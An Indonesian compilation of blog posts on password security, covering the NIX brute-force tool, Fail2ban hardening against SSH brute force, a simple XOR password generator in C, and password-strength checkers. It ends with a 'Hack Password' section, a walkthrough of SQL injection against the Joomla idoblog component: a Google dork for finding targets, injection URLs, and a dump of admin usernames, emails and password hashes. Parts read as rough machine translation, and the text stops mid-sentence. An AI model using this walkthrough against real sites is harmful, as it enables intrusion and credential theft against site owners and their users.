Mencari Tools untuk :

1. Brute Force

NIX-Brute Force (password cracking tool )

Pada postingan kali ini saya hanya akan preview sedikit tentang sebuah tool NIX Brute Force yang kebanyakan digunakan oleh para pentester untuk login kesebuah system target.
NIX Brute Force adalah sebuah tool kecil yang menggunakan Teknik Brute force untuk masuk kesebuah system tanpa  otentikasi terlebih dahulu. tool ini dimaksudkan agar sebuah system harus memiliki password yang kuat, bukan password yang dapat dengan mudah ditebak atau bisa dengan cepat ditembus dengan teknik Brute Force. Tujuan dari NIX adalah untuk mendukung berbagai service yang memungkinkan kita untuk melakukan remote authentication seperti : MySQL, SSH, FTP, IMAP. Hal ini didasarkan pada NIX Proxy checker.

FiturNIX :

  • Dasar Otentikasi dan mendukung Mode SSL Standardan HTTPS
  • HTTP/SOCKS 4 dan 5 dukungan proxy.
  • Deteksi otomatis form dan input manual form konfigurasi
  • Pengacakan/Random Wordlist melalui macro
  • Otomatis mematikan proxy yang sudah tidak bisa dipakai, proxy yang sudah tidak bisa diandalkan, dan ketika mekanis perlindungan situs memblok proxy.
  • Pengacakan proxy terpadu untuk mengalahkan mekanisme perlindungan tertentu.
  • Dengan ke AKURATan 99% untuk hasil yang sukses atau hasil yang gagal.
  • Advanced coding dan pengaturan time out, sehingga membuat tool ini sedikit lebih unggul dibandingkan dengan tool sejenis lainnya.
Menangkal serangan bruteforce di berbagai service server dengan Fail2ban

Tutorial kali ini saya akan membahas mengenai bagaimana mempertahankan server dari serangan usil “bruteforce”

apa itu bruteforce ?

bruteforce itu adalah tehnik untuk mencoba login kesuatu service tertentu dengan username dan password yang telah di list ( dalam arti lebih dari satu ) untuk mencoba kemungkinan login dengan list tersebut.

Tester :

attacker : backtrack

target : ubuntu server 8.0.4

untuk menangkal masalah ini , akan saya kenalkan salah satu tools yang gampang cara penginstalan dan cara confignya .. hingga seorang sys admin pemula pun dapat menkonfigurasinya dengan mudah ..sebagai contoh uji coba di server ubuntu 8.0.4

bagi sesama pengguna keluarga debian seperti ubuntu , kita install tools tersebut dengan mengetikan

#sudo apt-get install fail2ban

sesudah terinstall dengan baik langkah selanjutnya ada mengcopy file konfigurasi

#sudocp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local

lalu kita coba edit file tersebut

#sudo vim /etc/fail2ban/jail.local

ok…saya akan coba jelasin satu2 mengenai file konfigurasinya dan mencoba untuk memberikan hasil tester..

konfigurasi whitelist ip / igonoringip
konfigurasi ini untuk mendaftar ip yang tidak akan di banned walau melakukan kesalahan login padawaktu yang ditentukan

konfigursi email report
konfigurasi ini untuk menentukan kemana fail2 ban untuk mereport

konfigurasi service-service yang akan di protect [ jail ]

[*] service ssh

Pada konfigurasi file terdapat konfigurasi ssh

[ssh]

enabled = true // mengaktifkan proteksi terhadap ssh

port = ssh // [ port yang di gunakan ssh / anda dapat menggantinya secara numerik ]

filter = sshd // service tipe

logpath = /var/log/autho.log // path file log

maxretry = 6 // maksimal bruteforce attemp sebelum di banned di ip table

tested attacker from :
192.168.1.8 operating system backtrack 5 R1

hasil :

email saya setting kezee@indonesianbacktrack.or.id

 From fail2ban@ITSecurity Thu Jul 16 04:59:24 2009

 Subject: [Fail2Ban] ssh: banned 123.45.67.89

 Hi,

The ip 192.168.1.8 has just been banned by Fail2Ban after

 5 attempts against ssh.

Here are more information about 192.168.1.8:

{whois info}

Lines containing IP:192.168.1.8 in /var/log/auth.log

Jul 16 04:59:16 example.com sshd[10390]: Failed password for root from 192.168.1.8 port 46023 ssh2

 Jul 16 04:59:18 example.com sshd[10390]: Failed password for root from 192.168.1.8 port 46023 ssh2

 Jul 16 04:59:20 example.com sshd[10390]: Failed password for root from 192.168.1.8 port 46023 ssh2

 Jul 16 04:59:21 example.comsshd[10394]: reverse mapping checking

getaddrinfo for 192.168.1.8 [192.168.1.8] failed – POSSIBLE BREAK-IN ATTEMPT!

 Jul 16 04:59:22 example.com sshd[10394]: Failed password for root from 192.168.1.8 port 46024 ssh2

 Regards,

Fail2Ban

ketika saya cek log

#cat /var/log/auth.log

danketikasayacek di iptable
#sudoiptables -L

hmm…sangat work

ada beberapa konfigurasi yang tidak saya jelaskan satu persatu di sini , silahkan anda mencobanya sendiri ..

konfigurasi-konfigursi lain

[*] xinetd-fail

 [*] ssh-ddos

 [*] apache

 [*] ftp-server

 [*] mail-server

 [*] dns-server

2. Generate Password

SIMPLE PASSWORD GENERATOR

—// Intro \\ —

Menentukan password yang tepat memang gampang-gampang susah. Menggunakan password yang sederhana seperti user123, 123456, atau abc123 memang membuat kita dapat dengan mudah mengingatnya, namun password seperti itu sangat mudah ditebak dan tentunya berbahaya. Bersumber dari wikipedia dan pendapat saya sendiri,password yang baik mempunyai ciri-ciri sebagai berikut:

  • Terdiri dari kombinasi huruf besar, huruf kecil, digit, dan karakter khusus seperti !#$%^& dsb.
  • Panjang password minimal 8 karakter.
  • Password tidak ada hubungannya sama sekali dengan user name. ( ex : hidrogen_mr, admin123 )
  • Bukan Kata yang berasal dari kamus ( ex : inside, login, dll )
  • Bukan berupa karakter berurutan pada keyboard ( ex : asdf, qwerty )
  • Tidak mudah ditebak ( ex : admin, 1234, password )
  • Jangan menggunakan informasi personal seperti nama pacar, tanggal
    lahir, tempat lahit, dsb )
  • Contoh password yang baik : arr19*BbN1#

Tentu bukan hal yang menyenangkan jika tiba-tiba website pribadi anda diambil alih oleh orang lain gara-gara password cpanel terlalu mudah untuk ditebak ( ex : username : admin dan password : admin ). Bahkan yang lebih parah, sang pembajak bisa menyalahgunakan account anda yang sudah berhasil mereka “bobol” untuk kepentingan pribadi.

Tapi mengapa masih banyak user menggunakan password yang “jelek” padahal jelas-jelas itu tidak aman ?Jawabannya jelas karena password yang “jelek” sangat mudah untuk kita ingat.

Tentu hal yang baik jika orang lain tidak bisa mengakses dan menebak-nebak password e-mail pribadi kita. Namun jika kita sendiri yang tidak bisa mengakses e-mail gara-gara lupa password ?hum.. jelas bukan hal yang menyenangkan bukan ?

Ok, mungkin intro diatas sudah seringkali anda baca dan ketahui dengan baik.
Hanya sekedar mengingatkan bagi yang masih kurang berhati-hati.

–// Simple Password Generator \\—

Apa itu password generator ? Sederhananya password generator adalah aplikasi yang digunakan untuk meng-generate ( menghasilkan ) password. Password generator disini mempunyai fungsi yang berbeda dengan password generator yang digunakan untuk menyusun dictionary. Cara kerja password generator ini adalah menerima input berupas user name dan global key, lalu dengan rumus hash tertentu, program akan menghasilkan password berdasarkan kedua input tersebut.

Berikut Gambaran Penggunaanya :

Insert Account Name : user@yahoo.com
Insert Key : ganteng
Your Password : aTmMgbGPA

Insert Account Name : user@gmail.com
Insert Key : ganteng
Your Password : [UmMgTKGA

Dengan menggunakan password generator ini, kita cukup mengingat satu buah key saja ( ganteng ). Jika anda salah memasukan key, program tetap akan menghasilkan password, namun tentu saja hasilnya berbeda seperti contoh berikut :

Insert Account Name : user@yahoo.com
Insert Key : cantik
Your Password : XnZOv_CJA

Insert Account Name : user@gmail.com
Insert Key : ganteng
Your Password : ^kZOvYOAA

Mengapa disebut “simple” ? Karena program yang kita buat sangat sederhana ! Kita akan menggunakan metode-metode hashing yang sederhana untuk menggenerate password. Kalau begitu tidak aman dong ?Yup, memang tidak begitu aman, namun masih lebih baik daripada menggunakan abc123. Berikut karakteristik password generator yang akan kita buat :

  • Password yang dihasilkan selalu mempunyai panjang 9 karakter
  • Password dapat berupa kombinasi huruf besar, huruf kecil, angka, dan
    beberapa karakter khusus. Namun semua karakter memiliki nilai ASCII antara 65 (‘A’) s/d 122 (‘z’).
  • Password yang sudah digenerate secara default hanya ditampilkan dilayar (tidak disimpan di file lain )

—// Algoritma \\—

Sebelum mulai, ada baiknya kita jelaskan sedikit mengenasi fungsi “hash”, teman-teman pasti sudah banyak yang tahu, apa itu hash. Hash adalah suatu fungsi untuk mengubah karakter / string menjadi angka. Contoh dari fungsi hash yang terkenal yaitu md5, md4, atau sha.

Baik, kita langsung mulai saja.Sekarang, anda belum butuh compiler, cukup perhatikan baik-baik pernjelasannya.

Pernulis menggunakan compiler dev c++ versi 4.9.9.2 dari Bloodshed Software ( dapat anda download di situsnya http://www.bloodshed.net ) Runing on Windows XP + SP 2.
Karena program yang kita buat sederhana,algoritmanyapun kita buat sederhana saja (agar sederhana sempurna, he3..) Berikut algoritmanya :

  1. Baca Account Name, kita simpan ke dalam variabel bernama user
  1. Baca key, kita simpan ke dalam variabel bernawa key
  2. lu = panjang user
    lk = panjang key

User name dan key ini kita gunakan untuk menggenerate passwordnya. Metode yang digunakan adalah metode simple-XOR dengan sedikit modifikasi. Misalnya kita akan tampung hasil XOR pada variabel bernama buf maka :

buf[i] = user[i] XOR key[i] // nilai i berkisar dari 0 sampai lu

Pada kenyataanya, panjang dari key seringkali lebih pendek daripada panjang
user. Untuk itu fungsi XOR akan kita modifikasi sehingga jika karakter pada key tidak cukup untuk menjadi pasangan XOR user, maka key digunakan lagiuntuk menemani XOR karakter selanjutnya. contoh key = abc dan user = hidrogen

buf[0] = user[0] XOR key[0] = h XOR a
buf[1] = user[1] XOR key[1] = i XOR b
buf[2] = user[2] XOR key[2] = d XOR c
buf[3] = user[3] XOR key[0] = r XOR a
buf[4] = user[4] XOR key[1] = o XOR b
buf[5] = user[5] XOR key[2] = g XOR c
buf[6] = user[6] XOR key[0] = e XOR a
buf[7] = user[7] XOR key[1] = n XOR b

Caranya mudah, cukup dengan modulo. Operator modulu ( % ) ini juga yang nanti akan kita gunakan agar panjang output selalu 9 karakter. Maka fungsi kita menjadi :

buf[i] = user[i] XOR key[i mod lk] ;

Ternyata masih ada masalah yang cukup mengganggu. Dengan fungsi seperti ini, maka baik key = aaa atau key = aaaa akan menghasilkan output yang sama. Untuk itu kita modifikasi sekali lagi fungsi ini. Ada ide ? Sederhana saja, tambahkan output dengan panjang dari key (lk)

buf[i] = ( user[i] XOR key[i mod lk] + lk )

Hmm..sekarang fungsi kita sudah tampak lumayan. Masih ada yang perlu diperbaiki?Yupz, masih ada lagi yang dapat kita perbaiki. Dalam beberapa kasus seperti user dan key yang terlalu pandek juga user yang karakternya berulang. Password yang dihasilkan seringkali menggunakan karakter yang sama. contoh, jika usernya aaaaaaaaa dan key nya bb maka pasword yang dihasilkan adalah KFFFFFFFA.

Bagaimana memperbaikinya……? Kita pertahankan azas kesederhanaan, cukup tambahkan fungsi kita denngan nilai i. Sehingga fungi menjadi :

  1.  buf[i] = ( user[i] XOR key[i mod lk] + lk ) + i ; // untuk i = 0 s/d lu

Dengan fungsi yang diperbaharui ini, karakter yang dihasilkan nantinya menjadi lebih acak.Masih mau lanjut ?Sementara ini sampai disini saja dulu, silahkan anda modifikasi sendiri fungsinya agar output yang dihasilkan menjadi jauh lebih baik.Atau bahkan anda bisa menghilangkan perubahan yang anda rasa tidak perlu.

Nah..sekarang kita sudah punya data mentah yang disimpan dalam variabel buf, yang akan kita lakukan selanjutnya adalah, menghasilkan password matang dari data mentah yang sudah kita miliki. Seperti seudah disebutkan sebelumnya, password matang mempunyai beberapa karakteristik yaitu mempunyai panjang 9 karakter dan karakter karakternya mempunyai nilai ASCII antara 65 sampai 122.

Sekarang, bagaimana caranya agar password yang dihasilkan mempunyai panjang tepat 9 karakter ? he3..sekali lagi kata akan menggunakan metode yang sederhana. Idenya adalah, kita kan membagi semua nilai dalam varabel buf[] secara “tidak merata”, masksudnya begini. Misal panjang user 12, tentu panjang buf[] juga 12, ke 12 nilai tersebut akan kita jumlahkan kedalam variabel yang nantinya menampung password.
Karena panjang password hanya 9 karakter.kita akan memanfaatkan lagi fungsi modulo. Baik ,kita akan simpan password dalam variabel pass[], maka :

  1.  untuk i dari 0 s/d lu dimana lu = panjang user = panjang buf :

pass[i&8] = pass[i%8] + buf[i]

Hehehe..sederhana bukan ? Kita sudah mempunyai variabel pass dengan 9 nilai didalamnya. Sekarang tinggal bagian finishing. Kita akan ubah agar nilai-nilai dalam variabel pass selalu diantara 65 s/d 122. Caranya mudah cukup kita modulo dengan 57 ( 122 – 65 ) lalu tambahkan dengan 65.

pass[i] = pass[i] % 57 + 65

Nah..sebenarnya fungsi-fungsin kita sudah lengkap untuk menggenerate password. Namun, alangkah baiknya jika kita modifikasi lagi aga password yang dihasilkan nantinya lebih acak dan sulit ditebak. Mengapa tidak menggunakan fungsi random saja ? Hahaha, jika kita gunakan fungsi randon maka user dan key yang sama akan menghasilkan password berbeda setiap eksekusi, celaka dong, he3.. Ini adalah fungsi yang saya gunakan dalam program nantinya :

pass[i] = ( (pass[i] % 24 + i * 6 + 1988 ) % 57 ) + 65 ;

Darimana angka 24, 6, dan 1988 ?itu adalah tanggal lahir saya, he3.. benar-benar tidak bisa dipertanggung jawabkan ;p
Jika setiap langkah kita tulis dalam bahasa C, maka akan tampak seperti berikut ini :

-| step 1;

gets(user);

-| step 2;

gets(key);

-| step 3;

lk = strlen(key);
lu = strlen(user);

-| step 4;

for ( i = 0 ; i < lu ; i++ ) {
buf[i] = (user[i] ^ key[i%lk])+strlen(key)+i;
}

-| step 5;

for ( i = 0 ; i < lu ; i++ ){
pass[i%8] += buf[i] ;
}

-| step 6;

for ( i = 0 ; i < 9 ; i++ ){
pass[i] = ((pass[i]%24+i*6+1988)%57)+65;
}

-| step 7 ( cetak passwordnya )

for ( i = 0 ; i < 9 ; i++ ) {
printf(“%c”,pass[i]);
}

Yup, sekarang fungsi-fungsi yang kita miliki sudah lengkap untuk menyusun sebuah password generator sederhana. Sekali lagi, metode yang digunakan sangat trivial.. Saya bukan ahli kriptografi, untuk teknik-tenik yang lain silahkan anda tanya ahlinya seperti mamasexy atau cR45H3R.

–// Important Note ! \\—

Secara umum, algoritma yang digunakan masih jauh dari kata aman. Selain algoritma XOR yang terlalu sederhana dan mudah dipecahkan, teknik padding nya pun terkesan asal-asalan dengan melibatkan tanggal lahir sebagai “pad” nya.

Namun yang perlu anda ketahui, ini adalah konsep. Tentu saja algoritma yang sederhana ( meskipun tidak bisa dipertanggungjawabkan ) akan membuat tulisan ini lebih dimengerti dan diaplikasikan. Selanjutnya adalah tugas anda untuk memperbaiki program sederhana ini menjadi jauh lebih secure.Meungkin dengan teknik hashing yang lebih canggih atau bahkan algoritma yang sama sekali beda dengan apa yang sudah saya paparkan.
Walau begitu, penggunaan password generator ini masih jauh labih aman daripada menggunakan password trivial seperti “admin123″, “linda_sayang”, dll. Perlu diingat, gunakan master password yang benar-benar “secure” dan sulit ditebak ( Lebih lanjut mengenai password yang kuat silahkan lihat di wikipedia ).

–// Source Code \\—

Berikut Source code jadi yang sudah saya tambahkan embel-embel

//——————————-cut here———————————-\\

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

// simple password generator
// mr_hidrogen 22-11-06 ( wildan.rahman@gmail.com – site : blogipb.com )
// gunakan sesuka anda

int main() {
char key[100];
char user[100];
int buf[50];
int lu,lk ;
int i,j;
int pass[9];

for (i=0; i<9;i++) pass[i]=0;
printf(“Insert Account Name : “); gets(user);
printf(“Insert Key : “); gets(key);
lk = strlen(key);
lu = strlen(user);

for ( i = 0 ; i < lu ; i++ ) {
buf[i] = (user[i] ^ key[i%lk])+strlen(key)+i;
}

for ( i = 0 ; i < lu ; i++ ){
pass[i%8] += buf[i] ;
}
for ( i = 0 ; i < 9 ; i++ ){
pass[i] = ((pass[i]%24+i*6+1988)%57)+65;
} // 24 6 1988 is my birthday, he3..

printf(“Your Password : “);
for ( i = 0 ; i < 9 ; i++ ) {
printf(“%c”,pass[i]);
}

printf(“\n”);

system(“pause”);
}

//——————————-cut here———————————-\\

—// Referensi \\—

[1] cR45H3R, “Algoritma Enkripsi One Time Pad”, echo zine 14
[2] digital junkie, “Simple Password Management”, echo zine 13
[3] http://en.wikipedia.org/wiki/Password_strength
[4] http://browsex.com/XOR.html

[—————————————EOF———————————]

Penggunaan Generator Password

http://strongpasswordgenerator.com/

Pada umumnya jika anda menggunakan password generator, maka kombinasi angka, huruf besar, huruf kecil serta bentuk symbol lainnya, itu akan tersusun secara acak.  Manfaat lain dalam penggunaan password generator yaitu mudah dalam membuat password, serta anda juga harus mudah mengingatnya baik itu dengan cara menulisnya dengan sesuatu yang bisa anda simpan sendiri. Dalam penggunaan ini juga menyulitkan Cara pembobol password, karena dengan generator password tersebut angka dan karakter maupun symbol tersusun secara acak tanpa batas, jadi pembobol password kesulitan mendapatkan password anda, karena prosesnya lama apabila anda menggunakan generator password dengan karakter yang cukup panjang. Efektif dalam penggunaan generator password  adalah dengan pemanfaatan pemrograman javascript, karena daripada melakukan download software dari internet itu juga kurang efektif kalau enggak yang portable, meskipun cara penggunaannya adalah sama yaitu degan cara mengatur panjang atau pendeknya password yang anda buat dengan berbagai pilihan karakter.

Cara Pembobolan Password

Berbagai macam cara metode untuk membobol password, biasanya Hacker  yang dapat diartikan dengan programmer yang pandai dan senang dalam mengutak atik sesuatu / modal nekat atau disebut juga dengan neritik (dalam bahasa jawanya ). Bagi seorang hacker, perlindungan terhadap sistem komputer adalah tantangan ,karena  mereka biasanya akan mencari  cara bagaimana caranya menembus password, firewall, acces key, dan sebagainya. Walaupun demikian hacker bisa dibedakan atas dua golongan, golongan putih dan golongan hitam.

Yang saya tau mengenai pencurian password ataupun pembobolan password yaitu dengan cara,

  1. Menebak nebak password yang mudah diingat , biasanya para pemakai password menggunakan password yang mudah diingat misalnya dengan cara memakai nomer hp nya, namanya sendiri, atau juga biasanya ia menggunakan kata kata dari kamus bahasa inggris yang mudah diingat juga.
  2. Brute Force, yaitu upaya untuk memecahkan kode password dengan menggunakan bantuan software yang didalam software tersebut mempunyai banyak kode kode yang berupa angka, huruf besar, huruf kecil, dan jenis symbol symbol lain dengan berbagai kombinasi.
  3. Sosial Engginering, Serangan ini biasanya melibatkan manusia sendiri yang sedang kurang konsentrasi dengan lawan bicara. Biasanya pelaku hacker mencoba membuka informasi rahasia dengannya dengan cara mengelabui korbannya.
  4. Membuat halaman login palsu pada address bar, biasanya melalui kiriman e-mail palsu, supaya korban mengklik halaman login palsu itu, terus kemudian sikorban disuruh melakukan pengisian username  beserta password dalam halaman login tersebut. Jadi secara tidak sadar maka sikorban telah tertipu dengan segaja memasukkan identitas mereka.

Jadi saya sarankan bila anda membuat account ; sebaiknya jangan anda tampilkan alamat email anda, bila anda menampilkan alamat email itu berarti bahwa anda sudah menganggap alamat email anda itu untuk umum, masalah penggunaan password yang cukup panjang itu juga membuat agar pelaku pembobolan password dengan bantuan software / Brute Force itu memerlukan waktu yang cukup banyak, anda jangan khawatir karena password yang panjang kemungkinan malah anda sendiri yang lupa_ tapi ingat pasti anda sering dan terbiasa menggunakan password yang panjang

Apa ya harus memakai password yang panjang ??

Jawabanya ya tidak harus anda menggunakan password yang panjang jika anda menganggap account anda itu sudah aman dari gangguan, semuanya berawal dari ketenangan perasaan anda sendiri.

Serangan mata mata keylogger = kemungkinan serangan dari dalam yang berupa software yang terinstal berbahaya pada komputer anda.

3. Cek Kekuatan Password

Cek Kekuatan Password di Windows Apps

Sebagian besar aplikasi Windows (Google Talk.MS Outlook, Firefox, Internet Explorer, dan sebagainya) memiliki form login sehingga pengguna bisa menyimpan username dan password. Form login sangat memudahkan pengguna karena mereka tak perlu selalu harus memasukkan detail login. Kelemahannya, sistem operasi Windows tidak mempunyai opsi agar bisa mendaftar semua detail login yang berada di software untuk memverifikasi integritas username dan password.

Password Security Scanner adalah aplikasi yang bisa menemukan semua detail login yang tersimpan di komputer sehingga kamu bisa memeriksa kekuatan password dan atribut lain tanpa perlu mengekstraksi detail login dari aplikasi. Aplikasi multi bahasa ini bisa digunakan pada semua versi sistem operasi Windows. Saat ini Password Security Scanner mampu men-scan beberapa aplikasi, yaitu Internet Explorer 4.0 -6.0, IE 7.0 – 9.0, Mozilla Firefox (semuaversi), VPN, MSN/Windows Messenger, MS Outlook, dan Windows Live Mail.

Unduh aplikasi pada alamat: http://www.nirsoft.net/utils/password_security_scanner.html. Begini cara memeriksa  kekuatan password:

  1. Jalankan unzip pada paket aplikasi yang kamu unduh.
  2. Klik dua kali pada file Password Scan.exe. Aplikasi akan mendata semua detail login yang tersimpan pada aplikasi yang terinstal pada sistem operasi Windows.
  3. Jika kamu ingin memfilter daftar detail login, maka klik Advanced Options dari menu Options. Kamu akan bisa menampilkan password yang tidak aman dari mulai yang jumlah karakternya sedikit atau password yang kurang kuat. Berikan tanda centang pada opsi Display only items with password length lower than, dan Display only items with password strength lower than. Klik OK untuk menerapkan pengaturan yang telah kamu buat.
  4. Klik dua kali pada item di dalam daftar untuk secara lengkap menampilkan informasi kekuatan password. Kamu akan mendapati kotak dialog terpisah, lengkap dengan atribut kekuatan password, sehingga kamu bisa memeriksa Password Type, Application, User Name, Computer Name, sampai Windows User. Klik OK setelah kamu selesai mengamati kekuatan password pada item tersebut.

Cek Kekuatan Passwordmu Dengan Cracklib-Chek

password merupakan kata kunci untuk dapat masuk ke dalam sebuah akun, sistem komputer atau yang lainnya. kekuatan password memegang peranan sangat penting dalam menjaga keamanan data-data disamping infrastruktur keamanan yang lain. ada banyak aplikasi yang bisa digunakan untuk mengetahui kekuatan password kita, salah satunya adalah cracklib-check yang sudah menjadi bawaan dari gnu/linux.

contoh password yang buruk

[handry@madesu ~]$ echo “12345” | cracklib-check
12345: it is too short

[handry@madesu ~]$ echo “1234567890” | cracklib-check
1234567890: it is too simplistic/systematic

password yang cukupbaik

[handry@madesu ~]$ echo “h4nd121T@mp4n” | cracklib-check
h4nd121T@mp4n: OK

sebenarnya untuk mengetahui kekuatan password tidak perlu menggunakan aplikasi apapun, cukup memilih password yang lebih dari 8 karakter dan banyak bergaul dengan anak alay yang biasa menulis status dengan gabungan huruf kecil, besar, angka dan karakter lainnya…

aplikasi cek  kekuatan password, berikut skripnya :

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv=”content-type” content=”text/html; charset=utf-8″ />
<title>Aplikasi Cek Password – RamdhaniPurnamaAlam</title>
<script src=”jquery.js”></script>
<link href=’http://fonts.googleapis.com/css?family=Vollkorn&#8217; rel=’stylesheet’ type=’text/css’>
<link rel=”stylesheet” type=”text/css” href=”style.css” />
<script src=”script.js”></script>
</head>

<body bgcolor=”blue”>
<div id=”container”>

<div id=”header”>
Nama    : RamdhaniPurnamaAlam<br>
Kelas    : 3-A<br>
NPM        : 1103037<br>
<h2>AplikasiCek Password<h2>

</div>

<div id=”content”>

<form id=”register”>
<label for=”password”>Password : </label>
<input name=”password” id=”password” type=”password”/>
<span id=”result”></span>
</form>

</div>

<div id=”footer”>
by RamdhaniPurnamaAlam
</div>

</div>
</body>
</html>

sekian yang saya buat aplikasi cek kekuatan password. Terimakasih.

 CekKekuatan Password

Posted on February 9, 2013 by regasetiadipermana

pengertian password

Password adalah kode rahasia, kata sandi yang merupakan kunci untuk bisa mengakses atau membuka suatu sistem yang dikunci.Password juga bisa disebut dengan kunci.

Password merupakan rahasia, jika ada orang lain yang mengetahui password tersebut, bisa jadi orang yang tidak berhak tersebut akan menghapus atau mencuri berkas-berkas yang ada. Jadi sebaiknya dalam selang waktu tertentu password sebaik nya diganti dan agar kerahasiaan nya terjamin, sebaiknya hal-hal berikut ini tidak digunakan :

  • Nama atau nama panggilan
  • nama orang tua, pacar, saudaraatau orang dekat
  • sesuatu yang mudah ditebak, seperti nama kota, jenis musik yang disukai oleh orang yang mempunyai password tersebut

Password yang baik adalah password yang susah ditebak oleh orang lain dan mudah di ingat oleh Anda dan hal-hal yang disarankan:

  • Menggunakan kombinasi huruf besar dan huruf kecil
  • Mengandung angka dan karakter  tanda baca (seperti ?,! dll)
  • Panjangnya minimal 6 karakter lebih panjang lebih baik
  • dan update password anda minimal 2 minggu sekali.

Cara Mudah Cek Kekuatan / Kerumitan Password dengan JQuery

iRate This

Kalau kita lihat judul diatas, mungkin beberapa pembaca sempat bertanya kenapa c harus cek kekuatan/kerumitan password?Ini dilakukan karena beberapa dari kita sering memasukan password yang mudah di tebak.Misalnya 1234, abcd ,tanggal lahir dsb.  Padahal kalau password kita mudah ditebak maka bukan tidak mungkin akun kita bisa di bobol oleh orang yang tidak bertanggung jawab.

Oleh karena itu, sebaiknya kita menggunakan password strength meter agar password yang dimasukan oleh pengguna web bisa dilihat apakah password nya terlalu pendek, lemah (weak), medium atau pun strong. Dengan adanya pengecekan tersebut, diharapkan pengguna web kita bisa memasukan password dengan kombinasi yang cukup rumit agar tidak mudah dibobol.

Requirement :
– Download Jquery
– Download JqueryPStrength
– Download Editor PHP/HTML misalnya Adobe Dreamweaver, Notepad ++, CodeLobster, dll.

Cara membuatnya :
1. Ketik kan kode berikut di editor kesayangan anda.

view source

print?

01 <html>
02  <head>
03  <title>Untitled Document</title>
04  <scripttype="text/javascript"src="jquery.js"></script>
05   <scripttype="text/javascript"src="jquery.pstrength-min.1.2.js"></script>
06   <scripttype="text/javascript">
07         $(function()
08         {
09             $('#txtPass').focus(function()
10             {
11                 $('#txtPass').pstrength();
12             });
13         });
14         </script>
15     </head>
16 <body>
17     <formaction=""method="post">
18     Password : <inputtype="text"name="txtPass"id="txtPass"/>
19     </form>
20 </body>
21 </html>

Penjelasan Kode :
– Baris 4 : Karena kiata menggunakan Jquery, maka kitaharus sertakan library jquery
– Baris 5 : Sertakan Plugin Jquery yaitu jquery pstrength agar jquery bisa cek kekuatan password
– Baris 9 : $(‘#txtPass’).focus  artinya ketika kursor berada di inputan yang id nya adalah txt Pass (baris ke-18) maka kerjakan kode di bawah ini
– Baris 11 : $(‘#txtPass’).pstrength artinya cek kekuatan password yang diketikkan di inputan yang ber id txtPass
– Baris 18 : M mebuatan inputan (isian) text yang bernama txtPass dan ber id txtPass.

2. Save / simpan dengan nama cekPassword.html
3. Buka cekPassword.html di browser kesayangan anda. Like Loading…

http://belajarbuatprogram.wordpress.com/2011/10/29/cara-mudah-cek-kekuatan kerumitan-password-dengan-jquery/

4.Hack Password

Bisa dilihat pada link  Praktisk_hacking

Apa itu Hacking…???

Hacking Adalah sebuah Seni Ketrampilan Mengoperasikan / Mengendalikan / Menguasai Komputer Mencakup Semua Aspek Mulai Dari Level Dasar Sampai Level Tertinggi Baik Dalam Komputerisasi Dasar, Pemrograman Dasar Sampai Dengan Jaringan Yang Sangat Rumit. Sedangkan orang yang mampu melakukan itu semua di beri julukan “hacker”.

hacker : adalah orang yang mempelajari, menganalisa, memodifikasi, menerobos masuk ke dalam komputer dan jaringan komputer, baik untuk keuntungan atau dimotivasi oleh tantangan.
Hacker umumnya JUSTRU tidak sangat ingin di publikasikan apalagi sampai menggembar-gemborkan dirinya adalah hacker. Justru hacker cenderung diam dan tertutup dengan status sosial yang sangat normal. Bahkan sangat tidak mungkin anda sangka seseorang yang pendiam dan lugu bahkan culun adalah seorang hacker (bukan berarti semuanya). Hacker umum-nya tidak merusak, mereka kebanyakan mencari informasi/data penting tingkat tinggi bukan untuk mencuri/kesenangan tapi lebih cenderung untuk mengetes, bukan mengetes kemampuan mereka tapi system yang sedang mereka hadapi. Kebanyakan hacker tidak sangat mudah di kalahkan mereka mampu menguasai dan memutar balik keadaan karena mereka bisa di anggap satu level dengan system…
Hacking juga bisa dengan EXPLOIT

Tutorial Joomla (Hacking)

Pendahuluan: Joomla! sebagai Stabil-Kendali Paket mungkin unhackable dan
Jika seseorang mengatakan bahwa Joomla HACKED sampah, bicara!
Namun orang masih hack situs yang menggunakan Joomla sebagai Content Management System?!?
Joomla terbuat dari komponen dan modul, dan ada beberapa pengembang terpisah dari
tim resmi yang menawarkan solusi untuk meningkatkan Joomla.
Itu komponen dan modul mede oleh pengembang yang lain titik-titik lemah!

Aku meng-hack situs yang menggunakan Joomla! v1.5.6 dan setelah itu v1.5.9 melalui IDoBlog v1.1, tapi aku tidak bisa mengatakan bahwa saya hack Joomla!

Mencari Exploit Dan Target: Kedua langkah bisa masuk urutan yang berbeda, tergantung apa yang Anda temukan target pertama atau mengeksploitasi …

Google dork: inurl: “option = com_idoblog”
Datang dengan hasil untuk sekitar 140.000 halaman

Joomla Komponen idoblog 1.1b30 (com_idoblog) SQL Injection Vulnrablity

Eksploitasi dapat dipisahkan dalam dua bagian:

Bagian I
index.php option = com_idoblog & tugas? = profile & Itemid = 1.337 & userid = 62
Bagian ini membuka halaman blog Admin dan jika halaman Admin tidak ada, mengeksploitasi tidak akan bekerja (tidak sepenuhnya dikonfirmasi)

Bagian II

Bagian ini mencari username dan password dari tabel jos_users

Pengujian Kerentanan

Nonaktifkan gambar untuk loading halaman lebih cepat:
[Firefox]
Tools >> Options >> Content (menu tab) >> dan ‘Muat gambar secara otomatis’ unclick

Pergi ke:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Situs beban normal …

Pergi ke:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Situs konten blog Profile Admin

Pergi ke:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1–
Situs rentan

Inject Sasaran

Buka reiluke SQLiHelper 2.7
Dalam copy Sasaran

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
dan klik Inject
Ikuti langkah-langkah standar sampai Anda menemukan Nama Kolom, sebagai akibat yang kita miliki

Perhatikan bahwa mengeksploitasi dari inj3ct0r tidak akan bekerja di sini karena mencari meja jos_users dan seperti yang Anda lihat
target kami menggunakan jos153_users tabel untuk menyimpan data

Biarkan Dump nama pengguna, email, password dari jos153_users Nama Kolom. Klik pada Dump Now

username: admin
email: info@site.com
sandi: 169fad83bb2ac775bbaef4938d504f4e: mlqMfY0Vc9KLxPk056eewFWM13vEThJI

Joomla! 1.5.x menggunakan md5 hash untuk password. Ketika password yang dibuat, mereka hashed dengan
32 Karakter garam yang ditambahkan ke akhir dari string password. Sandi akan disimpan sebagai
